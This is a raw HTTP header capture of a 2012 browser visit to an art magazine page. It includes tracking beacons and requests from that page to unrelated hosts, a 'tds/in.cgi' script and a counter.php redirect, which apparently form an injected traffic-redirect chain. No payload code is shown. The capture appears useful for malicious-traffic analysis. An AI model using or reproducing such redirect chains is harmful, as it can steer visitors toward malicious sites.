GET /b2?c1=7&c2=8097938&rn=1730076676&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fartworksmagazine.com%252F2010%252F04%252Fphotography-of-alexis-west%252F%26jsref%3D%26rnd%3D1352305274077&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&cv=2.2&cs=js HTTP/1.1

Host: b.scorecardresearch.com
GET /b2?c1=7&amp;c2=8097938&amp;rn=1730076676&amp;c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fartworksmagazine.com%252F2010%252F04%252Fphotography-of-alexis-west%252F%26jsref%3D%26rnd%3D1352305274077&amp;c3=8097938&amp;c8=ShareThis%20Segmenter&amp;c9=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;cv=2.2&amp;cs=js HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;jsref=&amp;rnd=1352305274077
Cookie: UID=2d6a37e-195.159.219.8-1352305274; UIDR=1352305274
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 07 Nov 2012 16:21:14 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2008/05/manuel-neri.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2008/05/manuel-neri.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Tue, 10 Mar 2009 17:19:12 GMT
Content-Length: 5144
Etag: c9319967c038f9b923068dabdf60cfe3
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/03/grecco-1-300x298.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/03/grecco-1-300x298.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Tue, 10 Mar 2009 20:11:54 GMT
Content-Length: 7112
Etag: ba7609ee5789cc4dff171045a693a65f
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/06/aw-circlecat.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/06/aw-circlecat.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Mon, 15 Jun 2009 18:35:43 GMT
Content-Length: 6205
Etag: 03924fb32bcc6248036e209a716e3339
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/images/logo/aw.gif HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Last-Modified: Thu, 14 Jan 2010 22:33:59 GMT
Etag: &quot;6bf-47d277bad63c0&quot;
Accept-Ranges: bytes
Content-Length: 1727
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/images/navbar.png HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/wp-content/themes/arthemia-premium/style.css
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Last-Modified: Tue, 10 Mar 2009 00:46:33 GMT
Etag: &quot;137-464b915202c40&quot;
Accept-Ranges: bytes
Content-Length: 311
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/images/diag_stripe.gif HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/wp-content/themes/arthemia-premium/style.css
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Last-Modified: Thu, 14 Jan 2010 22:20:45 GMT
Etag: &quot;2d-47d274c59e940&quot;
Accept-Ranges: bytes
Content-Length: 45
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads//2010/04/TR-SongWithoutWords.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads//2010/04/TR-SongWithoutWords.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Mon, 05 Apr 2010 22:00:10 GMT
Content-Length: 8903
Etag: 93ac0c50dd620dc7b88e5fe05c70e15b
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/09/9111.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/09/9111.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Fri, 11 Sep 2009 17:17:39 GMT
Content-Length: 9658
Etag: 9547ad6b651e2087bac67651aa92cd0d
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/images/left_stripe.gif HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/wp-content/themes/arthemia-premium/style.css
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Last-Modified: Tue, 10 Mar 2009 00:46:28 GMT
Etag: &quot;7e-464b914d3e100&quot;
Accept-Ranges: bytes
Content-Length: 126
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /tds/in.cgi?7?06ac4f00 HTTP/1.1

Host: dvd-players-sale.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: /tds/in.cgi?7
GET /pview?event=pview&fpc=7639673-13adbacee23-5fbe4ad9-1&sessionID=1352305274404.15284&sourceURL=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&hostname=artworksmagazine.com&location=%2F2010%2F04%2Fphotography-of-alexis-west%2F&publisher=ddf106a6-b62c-4589-9e49-4fc14a805f0d&shareHash=sthash.Gxs5LCjQ&incomingHash=&refDomain=&refQuery=&url=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&sharURL=&source=sharethis.js.4x&title=PHOTOGRAPHY%20OF%20ALEXIS%20WEST%20%7C%20Artworks%20Magazine&ts1352305274404.0= HTTP/1.1

Host: l.sharethis.com
GET /pview?event=pview&amp;fpc=7639673-13adbacee23-5fbe4ad9-1&amp;sessionID=1352305274404.15284&amp;sourceURL=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;hostname=artworksmagazine.com&amp;location=%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;publisher=ddf106a6-b62c-4589-9e49-4fc14a805f0d&amp;shareHash=sthash.Gxs5LCjQ&amp;incomingHash=&amp;refDomain=&amp;refQuery=&amp;url=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;sharURL=&amp;source=sharethis.js.4x&amp;title=PHOTOGRAPHY%20OF%20ALEXIS%20WEST%20%7C%20Artworks%20Magazine&amp;ts1352305274404.0= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __uset=yes
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Server: nginx/0.8.54
Date: Wed, 07 Nov 2012 16:21:14 GMT
Connection: keep-alive
Set-Cookie: __stid=CiIi0VCainq5KF8V4fFbAg==; expires=Thu, 07-Nov-13 16:21:14 GMT; domain=.sharethis.com; path=/
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM&quot;
GET /wp-content/themes/arthemia-premium/images/sub.png HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/wp-content/themes/arthemia-premium/style.css
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Last-Modified: Tue, 10 Mar 2009 00:46:48 GMT
Etag: &quot;5d-464b916050e00&quot;
Accept-Ranges: bytes
Content-Length: 93
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/images/dots_footer.gif HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/wp-content/themes/arthemia-premium/style.css
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Last-Modified: Tue, 10 Mar 2009 00:46:21 GMT
Etag: &quot;2b-464b914691140&quot;
Accept-Ranges: bytes
Content-Length: 43
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
GET /counter.php HTTP/1.1

Host: resumebackup.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 301 Moved Permanently

HTTP/1.1 301 Moved Permanently
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cache-Control: private
Content-Length: 0
GET /tds/in.cgi?7 HTTP/1.1

Host: dvd-players-sale.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 07 Nov 2012 16:21:14 GMT
Content-Length: 12134
Age: 0
Connection: keep-alive
GET /jobsearchtools.html/counter.php HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: /jobsearchtools.html/counter.php?3e3ea140
GET /images/soc_1.png HTTP/1.1

Host: ak3.imgaft.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 20 Sep 2012 00:33:24 GMT
Etag: &quot;0e2198bc796cd1:31d&quot;
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2838
X-Varnish: 1417567981 1417564303
Cache-Control: max-age=3888000
Date: Wed, 07 Nov 2012 16:21:15 GMT
Connection: keep-alive
GET /script/jquery-1.3.1.min.js HTTP/1.1

Host: ak3.imgaft.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 13 Jul 2010 18:55:42 GMT
Etag: &quot;0cbf3fdbc22cb1:316&quot;
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Varnish: 972597056 972517225
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 19149
Cache-Control: max-age=3888000
Date: Wed, 07 Nov 2012 16:21:15 GMT
Connection: keep-alive
GET /sd?s=95331&f=1 HTTP/1.1

Host: as.casalemedia.com
GET /sd?s=95331&amp;f=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=iso-8859-1
Server: Apache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Location: http://as.casalemedia.com/sd?s=95331&amp;f=1&amp;C=1
Content-Length: 236
Expires: Wed, 07 Nov 2012 16:21:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Nov 2012 16:21:15 GMT
Connection: keep-alive
Set-Cookie: CMID=G42HpEPS1IwAAB0dNUMAAABJ;domain=casalemedia.com;path=/;expires=Thu, 07 Nov 2013 16:21:15 GMT CMPS=133;domain=casalemedia.com;path=/;expires=Tue, 05 Feb 2013 16:21:15 GMT CMPP=007;domain=casalemedia.com;path=/;expires=Tue, 05 Feb 2013 16:21:15 GMT
GET /images/co_saleHFT.jpg HTTP/1.1

Host: ak3.imgaft.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Mon, 23 Jul 2012 23:47:30 GMT
Etag: &quot;055a1852d69cd1:50a&quot;
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 74023
X-Varnish: 110278109 110269117
Cache-Control: max-age=3888000
Date: Wed, 07 Nov 2012 16:21:15 GMT
Connection: keep-alive
GET /images/img_grayrule.png HTTP/1.1

Host: ak3.imgaft.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Tue, 22 Feb 2011 17:07:46 GMT
Etag: &quot;b3a8896b3d2cb1:317&quot;
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 921
X-Varnish: 1409312022 1409308300
Cache-Control: max-age=3888000
Date: Wed, 07 Nov 2012 16:21:15 GMT
Connection: keep-alive
GET /jobsearchtools.html/counter.php?3e3ea140 HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: /jobsearchtools.html/counter.php
GET /script/jquery-1.3.1.min.js HTTP/1.1

Host: ak2.imgaft.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 13 Jul 2010 18:55:42 GMT
Etag: &quot;0cbf3fdbc22cb1:316&quot;
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Varnish: 972597056 972517225
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=3888000
Date: Wed, 07 Nov 2012 16:21:15 GMT
Content-Length: 19149
Connection: keep-alive
GET /sd?s=95331&f=1&C=1 HTTP/1.1

Host: as.casalemedia.com
GET /sd?s=95331&amp;f=1&amp;C=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dvd-players-sale.com/tds/in.cgi?7
Cookie: CMID=G42HpEPS1IwAAB0dNUMAAABJ; CMPS=133; CMPP=007
HTTP/1.1 200 OK

Content-Type: text/javascript
Server: Apache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Content-Length: 6724
Expires: Wed, 07 Nov 2012 16:21:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Nov 2012 16:21:15 GMT
Connection: keep-alive
